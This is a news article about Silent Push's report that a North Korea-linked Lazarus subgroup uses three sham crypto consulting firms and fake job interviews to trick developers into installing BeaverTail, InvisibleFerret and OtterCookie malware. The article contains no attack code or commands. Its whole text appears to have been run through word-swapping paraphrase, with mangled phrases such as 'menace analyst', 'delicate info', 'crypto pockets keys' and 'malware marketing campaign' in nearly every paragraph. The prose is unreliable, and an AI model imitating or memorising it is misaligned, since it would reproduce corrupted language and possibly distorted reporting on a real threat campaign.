A subgroup of the North Korea-linked hacker group Lazarus arrange three shell corporations, two within the US, to ship malware to unsuspecting customers.
The three sham crypto consulting corporations — BlockNovas, Angeloper Company and SoftGlide — are being utilized by the North Korean hacker group Contagious Interview to distribute malware by pretend job interviews, Silent Push Risk Analysts said in an April 24 report.
Silent Push senior menace analyst Zach Edwards said in an April 24 assertion to X that two shell corporations are registered as reputable companies in america.
“These web sites and an enormous community of accounts on hiring / recruiting web sites are getting used to trick folks into making use of for jobs,” he stated.
“Throughout the job software course of an error message is displayed as somebody tries to document an introduction video. The answer is a straightforward click on repair copy and paste trick, which ends up in malware if the unsuspecting developer completes the method.”
Three strains of malware — BeaverTail, InvisibleFerret and Otter Cookie — are getting used in accordance with Silent Push.
BeaverTail is malware primarily designed for info theft and to load additional phases of malware. OtterCookie and InvisibleFerret mainly goal delicate info, together with crypto pockets keys and clipboard information.
Silent Push analysts stated within the report that hackers use GitHub, job itemizing’s and freelancer web sites to search for victims.
AI used to create pretend workers
The ruse additionally entails the hackers utilizing AI-generated pictures to create profiles of workers for the three entrance crypto corporations and stealing pictures of actual folks.
“There are quite a few pretend workers and stolen pictures from actual folks getting used throughout this community. We’ve documented a few of the apparent fakes and stolen pictures, nevertheless it’s essential to understand that the impersonation efforts from this marketing campaign are completely different,” Edwards stated.
“In one of many examples, the menace actors took an actual photograph from an actual particular person, after which appeared to have run it by an AI picture modifier software to create a subtly completely different model of that very same picture.”
Associated: Fake Zoom malware steals crypto while it’s ‘stuck’ loading, user warns
This malware marketing campaign has been ongoing since 2024. Edwards says there are identified public victims.
Silent Push recognized two builders focused by the marketing campaign; considered one of them reportedly had their MetaMask wallet compromised.
The FBI has since shut down no less than one of many corporations.
“The Federal Bureau of Investigation (FBI) acquired the Blocknovas area, however Softglide continues to be stay, together with a few of their different infrastructure,” Edwards stated.
No less than three crypto founders have reported in March that they foiled an try from alleged North Korean hackers to steal sensitive data by pretend Zoom calls.
Teams such because the Lazarus Group are the prime suspects in a few of the greatest cyber thefts in Web3, together with the Bybit $1.4 billion hack and the $600 million Ronin network hack.
Journal: Lazarus Group’s favorite exploit revealed — Crypto hacks analysis